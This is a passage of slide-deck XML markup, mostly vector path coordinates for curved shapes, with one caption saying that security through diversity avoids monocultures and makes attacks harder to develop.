                  <a:pt x="2682316" y="3877386"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2635326" y="3890937"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2587815" y="3903256"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2539809" y="3914330"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2539809" y="3978465"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2588183" y="3967886"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2636062" y="3956075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2683433" y="3943070"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2730271" y="3928872"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2776575" y="3913505"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2822308" y="3896995"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2867469" y="3879342"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2912033" y="3860584"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2955988" y="3840708"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2999308" y="3819766"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3041993" y="3797744"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3084004" y="3774681"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3125343" y="3750589"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3165983" y="3725468"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3205899" y="3699357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3245104" y="3672255"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3283547" y="3644201"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3321227" y="3615182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3358121" y="3585248"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3394227" y="3554387"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3429508" y="3522637"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3463963" y="3489998"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3497567" y="3456508"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3530308" y="3422154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3562159" y="3386988"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3593109" y="3350996"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3623145" y="3314217"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3652253" y="3276650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3680396" y="3238322"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3707587" y="3199257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3733774" y="3159455"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3758971" y="3118942"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3783152" y="3077743"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3806291" y="3035858"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3828377" y="2993313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3849395" y="2950121"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3869321" y="2906306"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3888155" y="2861881"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3905859" y="2816872"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3922420" y="2771267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3937838" y="2725115"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3952075" y="2678417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3965130" y="2631198"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3976979" y="2583472"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3987609" y="2535237"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="4321175" h="4310380">
                <a:moveTo>
                  <a:pt x="3987609" y="1779333"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3976979" y="1730959"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3965130" y="1683080"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3952075" y="1635709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3937838" y="1588871"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3922420" y="1542567"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3905859" y="1496834"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3888155" y="1451673"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3869321" y="1407109"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3849395" y="1363154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3828377" y="1319834"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3806291" y="1277150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3783152" y="1235138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3758971" y="1193800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3733774" y="1153160"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3707587" y="1113243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3680396" y="1074039"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3652253" y="1035596"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3623145" y="997915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3593109" y="961021"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3562159" y="924915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3530308" y="889635"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3497567" y="855179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3463963" y="821575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3429508" y="788835"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3394227" y="756983"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3358121" y="726033"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3321227" y="695998"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3283547" y="666889"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3245104" y="638746"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3205899" y="611555"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3165983" y="585368"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3125343" y="560171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3084004" y="535990"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3041993" y="512851"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2999308" y="490766"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2955988" y="469747"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2912033" y="449821"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2867469" y="430987"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2822308" y="413283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2776575" y="396722"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2730271" y="381304"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2683433" y="367068"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2636062" y="354012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2588183" y="342163"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2539809" y="331533"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2539809" y="395922"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2587815" y="407035"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2635326" y="419392"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2682316" y="432981"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2728760" y="447789"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2774645" y="463791"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2819946" y="480974"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2864662" y="499313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2908757" y="518807"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2952216" y="539419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2995028" y="561136"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3037167" y="583933"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3078619" y="607809"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3119361" y="632739"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3159379" y="658698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3198660" y="685673"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3237179" y="713651"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3274923" y="742607"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3311868" y="772515"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3347999" y="803376"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3383292" y="835152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3417735" y="867841"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3451301" y="901407"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3483991" y="935850"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3515766" y="971143"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3546627" y="1007275"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3576536" y="1044219"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3605492" y="1081963"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3633470" y="1120482"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3660444" y="1159764"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3686403" y="1199781"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3711333" y="1240523"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3735209" y="1281976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3758006" y="1324114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3779723" y="1366926"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3800335" y="1410385"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3819829" y="1454480"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3838168" y="1499196"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3855351" y="1544497"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3871353" y="1590382"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3886162" y="1636826"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3899751" y="1683816"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3912108" y="1731327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3923220" y="1779333"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3987609" y="1779333"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="4321175" h="4310380">
                <a:moveTo>
                  <a:pt x="4320667" y="2155012"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4320133" y="2107514"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4318571" y="2060041"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4315942" y="2012607"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4312285" y="1965223"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4307560" y="1917915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4301807" y="1870710"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4294987" y="1823618"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4287139" y="1776666"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4278223" y="1729867"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4268279" y="1683232"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4257268" y="1636788"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4245229" y="1590560"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4232122" y="1544561"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4217987" y="1498815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4202785" y="1453324"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4186555" y="1408137"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4169257" y="1363243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4150931" y="1318679"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4131538" y="1274457"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4111117" y="1230604"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4089628" y="1187132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4067111" y="1144066"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4043527" y="1101420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4018915" y="1059205"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3993235" y="1017460"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3966527" y="976185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3912933" y="1029652"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3939311" y="1071791"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3964597" y="1114412"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3988778" y="1157478"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4011866" y="1200975"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4033863" y="1244892"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4054741" y="1289202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4074528" y="1333881"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4093222" y="1378915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4110812" y="1424279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4127296" y="1469961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4142689" y="1515935"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4156989" y="1562176"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4170172" y="1608683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4182275" y="1655406"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4193260" y="1702346"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4203154" y="1749488"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4211955" y="1796783"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4219651" y="1844243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4226242" y="1891830"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4231741" y="1939531"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4236136" y="1987321"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4239438" y="2035175"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4241635" y="2083092"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4242740" y="2131034"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4242740" y="2178977"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4241635" y="2226919"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4239438" y="2274836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4236136" y="2322690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4231741" y="2370480"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4226242" y="2418181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4219651" y="2465768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4211955" y="2513228"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4203154" y="2560523"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4193260" y="2607665"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4182275" y="2654604"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4170172" y="2701328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4156989" y="2747835"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4142689" y="2794076"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4127296" y="2840050"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4110812" y="2885732"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4093222" y="2931096"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4074528" y="2976130"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4054741" y="3020809"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4033863" y="3065119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4011866" y="3109036"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3988778" y="3152533"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3964597" y="3195599"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3939311" y="3238220"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3912933" y="3280346"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3966527" y="3333813"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3993235" y="3292551"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4018915" y="3250806"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4043527" y="3208591"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4067111" y="3165945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4089628" y="3122879"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4111117" y="3079407"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4131538" y="3035554"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4150931" y="2991332"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4169257" y="2946768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4186555" y="2901873"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4202785" y="2856687"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4217987" y="2811195"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4232122" y="2765450"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4245229" y="2719451"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4257268" y="2673223"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4268279" y="2626779"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4278223" y="2580144"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4287139" y="2533345"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4294987" y="2486393"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4301807" y="2439301"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4307560" y="2392095"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4312285" y="2344788"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4315942" y="2297404"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4318571" y="2249970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4320133" y="2202497"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4320667" y="2155012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866121" y="4317619"/>
            <a:ext cx="2431415" cy="1701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635">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef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Security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by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diversity avoids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 monocultures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to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 make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attacks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harder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dev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lop.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802103" y="3140138"/>
            <a:ext cx="4321810" cy="4310380"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4321809" h="4310380">
                <a:moveTo>
                  <a:pt x="408952" y="1029652"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="355104" y="976185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="328307" y="1017460"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="302564" y="1059205"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="277876" y="1101420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="254241" y="1144066"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="231660" y="1187132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="210121" y="1230604"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="189636" y="1274457"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="170192" y="1318679"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="151815" y="1363243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134480" y="1408137"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="118198" y="1453324"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102958" y="1498815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="88785" y="1544561"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75641" y="1590560"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63563" y="1636788"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52539" y="1683232"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42557" y="1729867"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33629" y="1776666"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25742" y="1823618"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18910" y="1870710"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13144" y="1917915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8407" y="1965223"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4737" y="2012607"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2108" y="2060041"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="533" y="2107514"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2155012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="533" y="2202497"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2108" y="2249970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4737" y="2297404"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8407" y="2344788"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13144" y="2392095"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18910" y="2439301"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25742" y="2486393"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33629" y="2533345"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42557" y="2580144"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52539" y="2626779"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63563" y="2673223"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75641" y="2719451"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="88785" y="2765450"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102958" y="2811195"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="118198" y="2856687"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134480" y="2901873"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="151815" y="2946768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="170192" y="2991332"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="189636" y="3035554"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="210121" y="3079407"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="231660" y="3122879"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="254241" y="3165945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="277876" y="3208591"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="302564" y="3250806"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="328307" y="3292551"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="355104" y="3333813"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="408952" y="3280346"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="382485" y="3238220"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="357124" y="3195599"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="332867" y="3152533"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="309714" y="3109036"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="287667" y="3065119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="266725" y="3020809"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="246875" y="2976130"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228130" y="2931096"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="210489" y="2885732"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="193954" y="2840050"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="178511" y="2794076"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="164185" y="2747835"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="150952" y="2701328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="138823" y="2654604"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="127800" y="2607665"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="117881" y="2560523"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="109054" y="2513228"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="101333" y="2465768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="94729" y="2418181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89204" y="2370480"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="84797" y="2322690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81495" y="2274836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="79286" y="2226919"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78181" y="2178977"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78181" y="2131034"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="79286" y="2083092"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81495" y="2035175"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="84797" y="1987321"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89204" y="1939531"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="94729" y="1891830"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="101333" y="1844243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="109054" y="1796783"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="117881" y="1749488"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="127800" y="1702346"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="138823" y="1655406"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="150952" y="1608683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="164185" y="1562176"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="178511" y="1515935"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="193954" y="1469961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="210489" y="1424279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228130" y="1378915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="246875" y="1333881"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="266725" y="1289202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="287667" y="1244892"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="309714" y="1200975"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="332867" y="1157478"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="357124" y="1114412"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="382485" y="1071791"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="408952" y="1029652"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="4321809" h="4310380">
                <a:moveTo>
                  <a:pt x="1782076" y="3914330"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1734007" y="3903256"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1686458" y="3890937"/>
                </a:lnTo>
